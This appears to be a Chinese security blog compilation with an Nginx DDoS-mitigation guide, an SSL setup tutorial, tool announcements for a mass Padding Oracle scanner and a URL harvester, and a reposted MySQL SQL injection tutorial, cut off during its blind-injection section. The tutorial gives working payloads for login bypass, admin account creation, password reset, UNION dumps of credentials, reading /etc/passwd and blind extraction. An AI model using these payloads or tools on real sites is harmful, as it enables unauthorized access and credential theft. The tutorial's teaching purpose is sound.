【转载】使用Nginx、Nginx Plus抵御DDOS攻击

转载自:http://mp.weixin.qq.com/s?__biz=MzA3MzYwNjQ3NA==&mid=208998983&idx=1&sn=57c74bef6c19227660236fff74557c50&scene=5&srcid=101662lSEf1ZZiBlmMQCY3XS#rd

DDOS是一种通过大流量的请求对目标进行轰炸式访问,导致提供服务的服务器资源耗尽进而无法继续提供服务的攻击手段。

一般情况下,攻击者通过大量请求与连接使服务器处于饱和状态,以至于无法接受新的请求或变得很慢。

0x01 应用层DDOS攻击的特征

应用层(七层/HTTP层)DDOS攻击通常由木马程序发起,其可以通过设计更好的利用目标系统的脆弱点。例如,对于无法处理大量并发请求的系统,仅仅通过建立大量的连接,并周期性的发出少量数据包来保持会话就可以耗尽系统的资源,使其无法接受新的连接请求达到DDOS的目的。其他还有采用发送大量连接请求发送大数据包的请求进行攻击的形式。因为攻击是由木马程序发起,攻击者可以在很短时间内快速建立大量的连接,并发出大量的请求。

以下是一些DDOS的特证,我们可以据此特征来抵抗DDOS(包括但不限于):

  • 攻击经常来源于一些相对固定的IP或IP段,每个IP都有远大于真实用户的连接数和请求数。备注:这并不表明这种请求都是代表着DDOS攻击。在很多使用NAT的网络架构中,很多的客户端使用网关的IP地址访问公网资源。但是,即便如此,这样的请求数和连接数也会远少于DDOS攻击。
  • 因为攻击是由木马发出且目的是使服务器超负荷,请求的频率会远远超过正常人的请求。
  • User-Agent通常是一个非标准的值
  • Referer有时是一个容易联想到攻击的值

0x02 使用Nginx、Nginx Plus抵抗DDOS攻击

结合上面提到的DDOS攻击的特征,Nginx、Nginx Plus有很多的特性可以用来有效的防御DDOS攻击,可以从调整入口访问流量和控制反向代理到后端服务器的流量两个方面来达到抵御DDOS攻击的目的。

限制请求速度

设置Nginx、Nginx Plus的连接请求在一个真实用户请求的合理范围内。比如,如果你觉得一个正常用户每两秒可以请求一次登录页面,你就可以设置Nginx每两秒钟接收一个客户端IP的请求(大约等同于每分钟30个请求)。

limit_req_zone $binary_remote_addr zone=one:10m rate=30r/m;

server {

location /login.html {

limit_req zone=one;

}

}

`limit_req_zone`命令设置了一个叫one的共享内存区来存储请求状态的特定键值,在上面的例子中是客户端IP($binary_remote_addr)。location块中的`limit_req`通过引用one共享内存区来实现限制访问/login.html的目的。

限制连接数量

设置Nginx、Nginx Plus的连接数在一个真实用户请求的合理范围内。比如,你可以设置每个客户端IP连接/store不可以超过10个。

limit_conn_zone $binary_remote_addr zone=addr:10m;

server {

location /store/ {

limit_conn addr 10;

}

}

`limit_conn_zone`命令设置了一个叫addr的共享内存区来存储特定键值的状态,在上面的例子中是客户端IP( $binary_remote_addr)。location块中`limit_conn`通过引用addr共享内存区来限制到/store/的最大连接数为10。

关闭慢连接

有一些DDOS攻击,比如Slowlris,是通过建立大量的连接并周期性的发送一些数据包保持会话来达到攻击目的,这种周期通常会低于正常的请求。这种情况我们可以通过关闭慢连接来抵御攻击。

`client_body_timeout`命令用来定义读取客户端请求的超时时间,`client_header_timeout`命令用来定于读取客户端请求头的超时时间。这两个参数的默认值都是60s,我们可以通过下面的命令将他们设置为5s:

server {

client_body_timeout 5s;

client_header_timeout 5s;

}

设置IP黑名单

如果确定攻击来源于某些IP地址,我们可以将其加入黑名单,Nginx就不会再接受他们的请求。比如,你已经确定攻击来自于从123.123.123.1到123.123.123.16的一段IP地址,你可以这样设置:

location / {

deny 123.123.123.0/28;

}

或者你确定攻击来源于123.123.123.3、123.123.123.5、123.123.123.7几个IP,可以这样设置:

location / {

deny 123.123.123.3;

deny 123.123.123.5;

deny 123.123.123.7;

}

设置IP白名单

如果你的网站仅允许特定的IP或IP段访问,你可以结合使用allow和deny命令来限制仅允许你指定的IP地址访问你的网站。如下,你可以设置仅允许192.168.1.0段的内网用户访问:

location / {

allow 192.168.1.0/24;

deny all;

}

deny命令会拒绝除了allow指定的IP段之外的所有其他IP的访问请求。

使用缓存进行流量削峰

通过打开Nginx的缓存功能并设置特定的缓存参数,可以削减来自攻击的流量,同时也可以减轻对后端服务器的请求压力。以下是一些有用的设置:

  • `proxy_cache_use_stale `的updating参数告诉Nginx什么时候该更新所缓存的对象。只需要到后端的一个更新请求,在缓存有效期间客户端对该对象的请求都无需访问后端服务器。当通过对一个文件的频繁请求来实施攻击时,缓存功能可极大的降低到后端服务器的请求。
  • `proxy_cache_key `命令定义的键值通常包含一些内嵌的变量(默认的键值$scheme$proxy_host$request_uri包含了三个变量)。如果键值包含`$query_string`变量,当攻击的请求字符串是随机的时候就会给Nginx代理过重的缓存负担,因此我们建议一般情况下不要包含`$query_string`变量。

屏蔽特定的请求

可以设置Nginx、Nginx Plus屏蔽一些类型的请求:

  • 针对特定URL的请求
  • 针对不是常见的User-Agent的请求
  • 针对Referer头中包含可以联想到攻击的值的请求
  • 针对其他请求头中包含可以联想到攻击的值的请求

比如,如果你判定攻击是针对一个特定的URL:/foo.php,我们就可以屏蔽到这个页面的请求:

location /foo.php {

deny all;

}

或者你判定攻击请求的User-Agent中包含foo或bar,我们也可以屏蔽这些请求:

location / {

if ($http_user_agent ~* foo|bar) {

return 403;

}

}

http_name变量引用一个请求头,上述例子中是User-Agent头。可以针对其他的http头使用类似的方法来识别攻击。

限制到后端服务器的连接数

一个Nginx、Nginx Plus实例可以处理比后端服务器多的多的并发请求。在Nginx Plus中,你可以限制到每一个后端服务器的连接数,比如可以设置Nginx Plus与website upstream中的每个后端服务器建立的连接数不得超过200个:

upstream website {

server 192.168.100.1:80 max_conns=200;

server 192.168.100.2:80 max_conns=200;

queue 10 timeout=30s;

}

`max_conns`参数可以针对每一个后端服务器设置Nginx Plus可以与之建立的最大连接数。`queue`命令设置了当每个后端服务器都达到最大连接数后的队列大小,`timeout`参数指定了请求在队列中的保留时间。

处理特定类型的攻击

有一种攻击是发送包含特别大的值的请求头,引起服务器端缓冲区溢出。Nginx、Nginx Plus针对这种攻击类型的防御,可以参考[Using NGINX and NGINX Plus to Protect Against CVE-2015-1635](http://nginx.com/blog/nginx-protect-cve-2015-1635/?_ga=1.14368116.2137319792.1439284699)

优化Nginx性能

DDOS攻击通常会带来高的负载压力,可以通过一些调优参数,提高Nginx、Nginx Plus处理性能,硬抗DDOS攻击,详细参考:[Tuning NGINX for Performance](http://nginx.com/blog/tuning-nginx/?_ga=1.48422373.2137319792.1439284699)

0x03 识别DDOS攻击

到目前为止,我们都是集中在如何是用Nginx、Nginx Plus来减轻DDOS攻击带来的影响。如何才能让Nginx、Nginx Plus帮助我们识别DDOS攻击呢?`Nginx Plus Status module`提供了到后端服务器流量的详细统计,可以用来识别异常的流量。Nginx Plus提供一个当前服务状态的仪表盘页面,同时也可以在自定义系统或其他第三方系统中通过API的方式获取这些统计信息,并根据历史趋势分析识别非正常的流量进而发出告警。

0x04 总结

Nginx和Nginx Plus可以作为抵御DDOS攻击的一个有力手段,而且Nginx Plus中提供了一些附加的特性来更好的抵御DDOS攻击并且当攻击发生时及时的识别到。

英文原文:https://www.nginx.com/blog/mitigating-ddos-attacks-with-nginx-and-nginx-plus/

XAMPP Apache安装StartSSL免费SSL证书

本文原始链接:http://www.myhack58.com/Article/sort099/sort0100/2014/53529.htm

发现网上没有一个很全面的XAMPP Apache安装StartSSL免费SSL证书的教程,故分享下。

虽然本文是针对XAMPP Apache的,但应该只要是Apache,都是一样的。

一、申请免费SSL证书:

我是从StartSSL申请的免费一年SSL证书:

https://www.startssl.com/

https://www.startssl.com/?app=12

StartSSL免费SSL证书申请教程:

http://blog.csdn.net/ruixue0117/Article/details/22201303

http://www.freehao123.com/startssl-ssl/

二、SSL证书申请成功后需要的东西:

1、key文件:StartSSL申请SSL证书时提供的一长串加密的字符串,保存为server.key,后面用的时候需要解密;
2、crt文件:StartSSL申请SSL证书时提供的一长串加密的字符串,保存到server.crt;
3、sub.class1.server.ca.pem文件:StartSSL申请SSL证书申请crt成功的时候会提示下载;
4、ca.pem文件:StartSSL申请SSL证书申请crt成功的时候会提示下载;

三、安装SSL证书:

我是在Linux XAMPP下操作的,Windows版本XAMPP是类似的。
1、通过FTP或者SFTP等方式将server.key上传覆盖XAMPP原有的”/opt/lampp/etc/ssl.key /server.key”,将server.crt上传覆盖XAMPP原有的”/opt/lampp/etc/ssl.crt/server.crt”;
2、解密server.key文件:
在服务器上执行:
# cd /opt/lampp/etc/ssl.key/
# openssl rsa -in server.key -out server_decrypted.key
然后输入你申请SSL证书是输入的密码,即可解密server.key文件。
3、将server.key文件重命名或者删除,然后把上一步解密好的server_decrypted.key文件重命令为server.key
4、将sub.class1.server.ca.pem和ca.pem上传到/opt/lampp/etc/ssl.crt/目录下;
5、修改/opt/lampp/etc/extra/httpd-ssl.conf配置文件,搜索SSLCertificateChainFile和SSLCACertificateFile,对应节点下增加以下两行并保存修改:
SSLCertificateChainFile “/opt/lampp/etc/ssl.crt/sub.class1.server.ca.pem”
SSLCACertificateFile “/opt/lampp/etc/ssl.crt/ca.pem”
6、重启Apache或直接重启XAMPP:
/opt/lampp/xampp restart
5、通过https访问你的网站。

四、另外,感谢以下两个参考教程:

Apache下安装StartSSL免费证书

http://fengfan.blog.163.com/blog/static/13478622013713114942896/

http://blog.csdn.net/ruixue0117/Article/details/23923395

http://www.myhack58.com/Article/sort099/sort0100/2014/53529.htm

安全漏洞信息播报平台

闲来无聊开发了一个漏洞播报平台,信息源包含20多个(非)主流的中外漏洞报告网站以及新浪微博。

目前可通过关注微信公众号(安全小飞侠)体验:
qrcode_for_gh_45c59cdac0a0_430.jpg

功能介绍:
【0】最新安全事件推荐
【1】最新安全事件查询
【2】专属安全事件订阅
【3】取消订阅
【4】订阅设置

help.png

1.查询最新推荐的安全事件

0.png

2.输入关键字查询最新安全事件

1.png

3.设置关键词列表并订阅

4.png

4-2.png

2.png

4.查询已订阅的安全事件

4-5.png

附:(漏洞播报平台网址)
Security Vulnerability Report Platforms:
# http://www.freebuf.com/
# http://www.wooyun.org/
# http://www.aqniu.com/
# https://web.nvd.nist.gov/
# http://www.antiy.com/
# http://www.chinais.net/
# http://www.securitycn.net/
# http://www.hack6.com/wzle/
# http://www.nsfocus.net/
# http://www.securityfocus.com/
# http://packetstormsecurity.com/
# http://farlight.org/
# https://www.exploit-db.com/
# https://bugscollector.com/db/
# http://butian.360.cn/
# https://www.t00ls.net/
# http://cxsecurity.com/
# http://bobao.360.cn/
# https://www.vulbox.com/
# http://www.secpulse.com/

PS:以上是微信公众号提供的功能,更多功能的API还在开发中,欢迎体验,有问题的话,可以联系我哦security_alert@126.com.

自动扫描和检测多个网站的Padding Oracle漏洞的脚本

基于PadBuster改写了一个测试 ASP.net Padding Oracle漏洞的自动化脚本。

在PadBuster.pl的基础上增加了自动扫描和检测多个网站是否存在Padding Oracle漏洞的功能,使用起来应该会比原来的脚本更加直观和方便。

具体参见:猛戳这里

具体的使用方法如下:
h.jpg
1. 单个URL自动获取webresource/scriptresource并尝试获取密钥:
singleURL.jpg
encrypted.jpg
2. 多个URL自动获取webresource/scriptresource导出webresource.txt并尝试获取密钥导出encryptedvalue.txt(脚本当前目录):
multiURLs.jpg
encrypted values.jpg
show encrypted values.jpg
3. 基于以获取的密钥暴力获取web.config的url:
bruteforce.jpg

URL自动采集脚本

分享一个自己编写的URL自动采集脚本

目前支持:

1. 指定关键词匹配(支持inurl,site,intitle等高级搜索功能)
2. 子域url扫描
3. wooyun厂商指定关键词匹配
4. 字符串加密

其他功能陆续添加中…

欢迎猛戳传送门

Usage:

hackUtils.py [options]

Options:

-h, –help                                  Show basic help message and exit
-b keyword, –baidu=keyword                 Fetch URLs from Baidu.com based on specific keyword
-w keyword, –wooyun=keyword                Fetch URLs from Wooyun Corps based on specific keyword
-d site, –domain=site                      Scan subdomains based on specific site
-e string, –encrypt=string                 Encrypt string based on specific encryption algorithms (e.g. base64, md5, sha1, sha256, etc.)

Examples:

hackUtils.py -b inurl:www.example.com
hackUtils.py -w .php?id=
hackUtils.py -d example.com
hackUtils.py -e text

b.JPG

d.JPG

w.JPG

e.JPG

【转载】MySQL: Secure Web Apps – SQL Injection techniques

/================================================================================\
———————————[ PLAYHACK.net ]———————————
\================================================================================/

-[ INFOS ]———————————————————————–
Title: “MySQL: Secure Web Apps – SQL Injection techniques”
Author: Omni
Website: http://omni.playhack.net
Date: 2009-02-26 (ISO 8601)
———————————————————————————

-[ SUMMARY ]———————————————————————
0x01: Introduction
0x02: Injecting SQL
0x03: Exploiting a Login Form
0x04: Exploiting Different SQL Statement Type
0x05: Basic Victim Fingerprinting
0x06: Standard Blind SQL Injection
0x07: Double Query
0x08: Filters Evasion
0x09: SQL Injection Prevention
0x10: Conclusion
———————————————————————————

—[ 0x01: Introduction ]

Hi everybody! I’m here again to write a little, but I hope interesting, paper concerning
Web Application Security. The aim of these lines are to help you to understand security
flaws regarding SQL Injection.

I know that maybe lots of things here explained are a little bit old; but lots of people
asked to me by email how to find/to prevent SQL Injection flaws in their codes.

Yes, we could say that this is the second part of my first paper regarding PHP flaws
(PHP Underground Security) wrote times ago; where I explained in a very basic form the SQL Injection
(The reason? The focus was on an other principal theme).

How I wrote this paper? In my free time, a couple of lines to help people to find, prevent
this kind of attacks. I hope you enjoy it. For any question or whatever please
contact me here: omni_0 [at] yahoo [DOT] com .
——————————————————————————-[/]

—[ 0x02: Injecting SQL ]

As you know almost every dynamic web applications use a database (here we talk
about web application based on “LAMP architecture”) to store any kind of data needed
by the application such as images path, texts, user accounts, personal information,
goods in stock, etc.

The web application access to those information by using the SQL (Structured Query
Language). This kind of applications construct one or more SQL Statement to query
the DataBase (and for example to retrieve data); but this query sometimes incorporporate
user-supplied data. (take in mind this)

What about SQL? SQL is a DML (Data Manipulation Language) that is used
to insert, retrive and modify records present in the DataBase.

As I said before web application uses user-supplied data to query the DB but if the
supplied data is not properly sanitized before being used this can be unsafe and
an attacker can INJECT HIS OWN SQL code.
These flaws can be very destructive because an attacker can:

– Inject his data
– Retrive information about users, CC, DBMS.. (make a kind of information gathering)
– and so on..

The fundamentals of SQL Injection are similar to lots of DBMS but, as you know
there are some differences, in this paper I will cover “Exploting SQL Injection
in MySQL DBMS” as said upon (this means that if you want to test techniques here
explained on others DBMS you need to try at your own).
——————————————————————————-[/]

—[ 0x03: Exploiting a Login Form ]

Sometimes happends that coders doesn’t properly sanitize 2 important variables
such as user-name and password in the login form and this involve a critical
vulnerability that will allow to the attacker the access to a reserved area.

Let’s make an example query here below:

SELECT * FROM users WHERE username = ‘admin’ and password = ‘secret’

With this query the admin supply the username ‘admin’ and the password ‘secret’
if those are true, the admin will login into the application.
Let us suppose that the script is vulnerabile to sql injection; what happends
if we know the admin username (in this case ‘admin’)? We don’t know the password, but
can we make an SQL Injection attack? Yes, easily and then we can gain the access to the application.
In this way:

SELECT * FROM users WHERE username = ‘admin’ /*’ and password = ‘foobar’

So, we supplied this information:

– As username = admin’ /*
– As password = foobar (what we want..)

Yes, the query will be true because admin is the right username but then with the
‘ /* ‘ symbol we commented the left SQL Statement.

Here below a funny (but true) example:

$sql = “SELECT permissions, username FROM $prefix”.”auth WHERE
username = ‘” . $_POST[‘username’] . “‘ AND password = MD5(‘”.$_POST[‘wordpass’].”‘);”;

$query = mysql_query($sql, $conn);

The variables passed with the POST method are not properly sanitized before being used
and an attacker can inject sql code to gain access to the application.
This is a simple attack but it has a very critical impact.
——————————————————————————-[/]

—[ 0x04: Exploiting Different SQL Statement Type ]

SQL Language uses different type of statements that could help the programmer to
make different queries to the DataBase; for example a SELECTion of record,
UPDATE, INSERTing new rows and so on. If the source is bugged an attacker can
“hack the query” in multiple ways; here below some examples.

SELECT Statement
——————

SELECT Statement is used to retrieve information from the database; and is
frequentely used “in every” application that returns information in response
to a user query. For example SELECT is used for login forms, browsing catalog, viewing
users infos, user profiles, in search engines, etc. The “point of failure” is
often the WHERE clause where exactly the users put their supplied arguments.

But sometimes happends that the “point of failure” is in the FROM clause; this
happends very rarely.

INSERT Statement
——————

INSERT statement is used to add new row in the table; and sometimes the application
doesn’t properly sanitize the data, so a query like the beneath could be vulnerable:

INSERT INTO usr (user, pwd, privilege) VALUES (‘new’, ‘pwd’, 10)

What happends if the pwd or username are not safe? We can absolutely “hack the
query” and perform a new interesting query as shown below:

INSERT INTO usr (user, pwd, privilege) VALUES (‘hacker’, ‘test’, 1)/*’, 3)

In this example the pwd field is unsafe and is used to create a new user with
the admin privilege (privilege = 1):

$SQL= “INSERT INTO usr (user, pwd, id) VALUES (‘new’, ‘”.$_GET[‘p’].”‘, 3)”;

$result = mysql_query($SQL);

UPDATE Statement
——————

UPDATE statement is used (as the word says) to UPDATE one or more records.
This type of statement is used when users (logged into the application) need
to change their own profile information; such as password, the billing address,
etc. An example of how the UPDATE statement works is shown below:

UPDATE usr SET pwd=’newpwd’ WHERE user = ‘billyJoe’ and password = ‘Billy’

The field pwd in the update_profile.php form is absolutely “a user-supply data”; so,
try to imagine what happends if the code is like the (vulnerable) code pasted below:

$SQL = “UPDATE usr SET pwd='”.$_GET[‘np’].”‘ WHERE user = ‘billyJoe’ and pwd = ‘Billy'”;
$result = mysql_query($SQL);

In this query the password needs to be correct (so, the user needs to know his own password :D)
and the password will be supplied with the GET method; but leave out this detail (it’s not so important
for our code injection) and concentrate to the new password field (supplied by $_GET[‘np’], that
is not sanitized); what happeds if we will inject our code here? Let see below:

UPDATE usr SET pwd=’owned’ WHERE user=’admin’/*’ WHERE user = ‘ad’ and pwd = ‘se’

here we just changed the admin password to ‘ owned ‘ :) sounds interesting right?

UNION SELECT Statement
————————-

The “UNION SELECT Statement” is used in SQL to combine the results of 2
or more different SELECT query; obviously in one result.
This kind of statement is very interesting because when you have a SELECT query
often you can add your own UNION SELECT statement to combine the queries (sure,
only if you have a “bugged sql statement”) and view the 2 (or more) results in only
one result set. To better understand what I mean I think is better to see an interesting
example and put our hands on it.

Here is our vulnerable code:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

$SQL = “select * from news where id=”.$_GET[‘id’];

$result = mysql_query($SQL);

if (!$result) {
die(‘Invalid query: ‘ . mysql_error());
}

// Our query is TRUE
if ($result) {
echo ‘<br><br>WELCOME TO www.victim.net NEWS<br>’;
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {

echo ‘<br>Title:’.$row[1].'<br>’;
echo ‘<br>News:<br>’.$row[2];
}

}

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

As we can see the $SQL variable is vulnerable and an attacker can inject his own
code into it and then gain interesting information. What happends if via browser we
call this URL: http://www.victim.net/CMS/view.php?id=1 ?

Nothing interesting, just our news with the ID equal to 1, here below:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

How to make this interesting? :) We can use our UNION SELECT operator, and the
resultant query will be:

select * from news where id=1 UNION SELECT * FROM usr WHERE id = 1

What is gonna happend? Look below:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?
Title:secret

News:
1

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

“Title: secret” is the admin password (ID = 1 is the admin in most cases) and the 1 in the “News:”
is the admin ID. So, why our output is so strange? This is not strange our tables has been made
in different ways. Just to make things clear look the tables below:

mysql> select * from usr;
———————–
| user   | pwd    | id    |
———————–
| admin | secret |    1 |
———————–
| ad     | aaaaa  |    2 |
———————–
| new   | test    |    5 |
———————–

mysql> select * from news;
—————————————————
| id   | title                | texts                              |
—————————————————
|    1 | testing news    | what about SQL Injection? |
—————————————————
|    2 | testing news 2 | could be bypassed easily?  |
—————————————————

Our UNION SELECT query will be:

mysql> select * from news where id = 1 union select * from usr where id = 1;
—————————————————
| id      | title              | texts                            |
—————————————————
| 1       | testing news | what about SQL Injection? |
—————————————————
| admin | secret          | 1                                   |
—————————————————

Is now clear? We have found the admin password. It’s great!

Ok, lets go deeper; what happends if we have 2 tables with a different number of
columns? Unfortunaltely UNION SELECT doesn’t work as show upon. I want to make
2 different examples to help you.

LESS FIELDS
————

mysql> select * from Anews;
————————————————
| title               | texts                                  |
————————————————
| testing news 2 | could be bypassed easily?      |
————————————————

mysql> select * from Anews union select * from usr;
ERROR 1222 (21000): The used SELECT statements have a different number of columns

Yes, this is what happends if the UNION SELECT is used and the tables have a different
number of columns. So, what we can do to bypass this?

mysql> select * from Anews union select id, CONCAT_WS(‘ – ‘, user, pwd) from usr;
——————————————–
| title          | texts                                  |
——————————————–
| testing news 2 | could be bypassed easily? |
——————————————–
| 1                   | admin – secret                |
——————————————–
| 2                  | ad – aaaaa                      |
——————————————–
| 5                 | new – test                       |
——————————————–

We bypassed “the problem” just using a MySQL function CONCAT_WS (CONCAT can be used too).
Take in mind that different DBMS works in different way. I’m explaining in a general manner; therefore
sometimes you have to find other ways. :)

MORE FIELDS
————-

mysql> select * from fnews;
——————————————————–
| id   | pri   | title               | texts                             |
——————————————————–
|    1 |    0 | testing news 2 | could be bypassed easily? |
——————————————————–

What we can do now? Easy, just add a NULL field!!

mysql> select * from fnews union select NULL, id, user, pwd from usr;
———————————————————
| id   | pri     | title               | texts                             |
———————————————————
|    1 |    0   | testing news 2 | could be bypassed easily? |
———————————————————
| NULL |    1 | admin             | secre                            |
———————————————————
| NULL |    2 | ad                 | aaaaa                            |
———————————————————
| NULL |    5 | new               | test                              |
———————————————————

——————————————————————————-[/]

—[ 0x05: Basic Victim Fingerprinting ]

In this part of the paper I’ll explain some easy, but interesting, ways used while trying to do
information gathering before the Vulnerability Assessment and Penetration Test steps.

This is our scenario: we found a bugged Web Application on the host and we can inject our
SQL code.

So, what we need to know? Could be interesting to know the mysql server version;
maybe it’s a bugged version and we can exploit it.

How to do that? (I will not use bugged code; I’ll just make some examples. Use your
mind to understand how to use “these tips”)

mysql> select * from fnews WHERE id = 1 union select version(), NULL, NULL, NULL from usr;
—————————————————————————–
| id                               | pri     | title                | texts                            |
—————————————————————————–
| 1                                |    0   | testing news 2 | could be bypassed easily? |
—————————————————————————–
| 5.0.22-Debian               | NULL | NULL              | NULL                             |
—————————————————————————–

Here our mysql version. Also the OS has been putted on the screen :) (take in mind that
sometimes these information are modified).

Could be interesting to know the server time:

mysql> select * from fnews WHERE id = 1 union select NOW(), NULL, NULL, NULL from usr;
—————————————————————————
| id                           | pri     | title               | texts                              |
—————————————————————————
| 1                            |    0   | testing news 2 | could be bypassed easily?  |
—————————————————————————
| 2009-02-27 00:03:56 | NULL | NULL              | NULL                              |
—————————————————————————

Yes, sometimes is useful to know what is the user used to connect to the database.

mysql> select * from fnews WHERE id = 1 union select USER(), NULL, NULL, NULL from usr;

——————————————————————–
| id                  | pri     | title               | texts                             |
——————————————————————–
| 1                   |    0   | testing news 2 | could be bypassed easily? |
——————————————————————–
| omni@localhost | NULL | NULL              | NULL                             |
——————————————————————–

An interesting function implemented in mysql server is LOAD_FILE that, as the
word say, is able to load a file. What we can do with this? gain information and
read files. Here below the query used as example:

select * from news where id=1 union select NULL,NULL,LOAD_FILE(‘/etc/passwd’) from usr;

This is what my FireFox shows to me:

http://www.victim.net/CMS/view.php?id=1%20union%20select%20NULL,NULL,LOAD_FILE(‘/etc/password’)%20from%20usr;

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?
Title:

News:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[…]
[output cutted]
[…]

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

Sounds interesting right, don’t you?

Could be interesting to get some sensitive information such as mysql users and passwords
right? By injecting our code as shown below we can get such that information.

SELECT * FROM news WHERE id=’1′ UNION SELECT Host, User, Password FROM mysql.user/*’
——————————————————————————-[/]

—[ 0x06: Standard Blind SQL Injection ]

SQL Injection and Blind SQL Injection are attacks that are able to exploit a software
vulnerability by injecting sql codes; but the main difference between these attacks
is the method of determination of the vulnerability.

Yes, because in the Blind SQL Injection attacks, attacker will look the results
of his/her requests (with different parameter values) and if these results will return
the same information he/she could obtain some interesting data. (I know, it seems
a bit strange; but between few lines you will understand better).

But why Standard Blind SQL Injection? What does it mean? In this part of the paper
I’ll explain the basic way to obtain information with Blind SQL Injection without bear
in mind that this type of attacks could be optimized. I don’t wanna talk about the
methods to optimize a Blind SQL Injection attack.(Wisec found interesting things about that –
“Optimizing the number of requests in blind SQL injection”).

Ok, let’s make a step forward and begin talking about Detection of Blind SQL Injection.
To test this vulnerability we have to find a condition that is always true; for example
1=1 is always TRUE right? Yes, but when we have to inject our code in the WHERE
condition we don’t know if our new injected query will be true or false; therefore
we have to make some tests. When the query is true? The query is true when the record
returned contain the correct information. Maybe is a little bit strange this explanation but
to make things clear I wanna let you see an example. Suppose that we requested this
URL:

http://www.victim.net/CMS/view.php?id=1

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

As you can see we have just viewed our first news (id=1). What happends if we request
this other URL: http://www.victim.net/CMS/view.php?id=1 AND 1=1 ?
In our browser we just see the same page because the query is obviously true.
Here below the injected query:

SELECT * FROM news WHERE id=1 AND 1=1 LIMIT 1

Now, we (I hope)  have understood what is a Blind SQL Injection; and to understand
better how we can use this, I want to make a simple example/scenario. I’m thinking that
the web application is connected to MySQL using the user omni; how to know this by using
Blind SQL Injection? Just requesting this URL:

http://www.victim.net/CMS/view.php?id=1 AND USER()=omni@localhost’

and watch the reply sent on our browser. If in our FireFox (or whatever you want)
we will see the news with ID=1 we know that omni is the user used to connect to
the mysql deamon (because the query is true; and we found the true value to pass
to the query).
Let’s go deeper. What we can do with Blind SQL? Could be interesting to retrieve
the admin password. How to do that? First of all to understand better the
steps I’m going to explain we need to know some basic information.

Function used in MySQL:

– ASCII(str)
Returns the numeric value of the leftmost character of the string str.
Returns 0 if str is the empty string. Returns NULL if str is NULL. ASCII()
works for 8-bit characters.

mysql> select ascii(‘a’);
———–
| ascii(‘A’) |
———–
|         97 |
———–

mysql> select ascii(‘b’);
———–
| ascii(‘b’) |
———–
|         98 |
———–

– ORD(str)

If the leftmost character of the string str is a multi-byte character, returns
the code for that character, calculated from the numeric values of its constituent
bytes using this formula:

(1st byte code)
+ (2nd byte code x 256)
+ (3rd byte code x 2562) …

If the leftmost character is not a multi-byte character, ORD() returns the same value as
the ASCII() function.

– SUBSTRING(str,pos), SUBSTRING(str  FROM pos),
SUBSTRING(str,pos,len), SUBSTRING(str  FROM pos FOR len)

The forms without a len argument return a substring from string str starting at position pos.
The forms with a len argument return a substring len characters long from string str, starting
at position pos.
The forms that use FROM are standard SQL syntax. It is also possible to use a negative value
for pos. In this case, the beginning of the substring is pos characters from the end of the
string, rather than the beginning.
A negative value may be used for pos in any of the forms of this function.

– SUBSTR(str,pos), SUBSTR(str  FROM pos),
SUBSTR(str,pos,len), SUBSTR(str  FROM pos FOR len)

SUBSTR() is a synonym for SUBSTRING().

mysql> select substring(‘Blind SQL’, 1, 1);
—————————-
| substring(‘Blind SQL’, 1, 1) |
—————————-
| B                                  |
—————————-

mysql> select substring(‘Blind SQL’, 2, 1);
—————————-
| substring(‘Blind SQL’, 2, 1) |
—————————-
| l                                   |
—————————-

– LOWER(str)

Returns the string str with all characters changed to lowercase according to
the current character set mapping. The default is latin1 (cp1252 West European).

mysql> SELECT LOWER(‘SQL’);
—————-
| LOWER(‘SQL’) |
—————-
| sql               |
—————-

– UPPER(str)

Returns the string str with all characters changed to uppercase according to
the current character set mapping. The default is latin1 (cp1252 West European).

mysql> SELECT UPPER(‘sql’);
————–
| UPPER(‘sql’) |
————–
| SQL           |
————–

Now we have understood the principals MySQL functions that could be used while
trying to do a Blind SQL Injection attack. (consult MySQL reference manuals for others)

What we need again? Suppose that we know for a moment the admin password: “secret”.

mysql> select ascii(‘s’);
———–
| ascii(‘s’) |
———–
|        115|
———–

mysql> select ascii(‘e’);
———–
| ascii(‘e’) |
———–
|        101|
———–

mysql> select ascii(‘c’);
———–
| ascii(‘c’) |
———–
|         99 |
———–

mysql> select ascii(‘r’);
———–
| ascii(‘r’) |
———–
|        114|
———–

mysql> select ascii(‘t’);
———–
| ascii(‘t’) |
———–
|        116|
———–

It’s time to watch the source code:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

[ … ]

$SQL = “select * from news where id=”.$_GET[‘id’].” LIMIT 1″;

$result = mysql_query($SQL);

if (!$result) {
die(‘Invalid query: ‘ . mysql_error());
}

[ … ]

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

Now, try to “exploit the bug” by requesting this URL:
http://www.victim.net/CMS/view.php?id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1)) = 115

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

The query is TRUE (we know that the first letter of the password is ‘s’) and therefore, the query will be:

SELECT * FROM news WHERE id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1)) = 115 LIMIT 1

What is the number 115? Read upon is the ascii value of the ‘s’. We retrieved the first character
of the password (by using some MySQL functions).

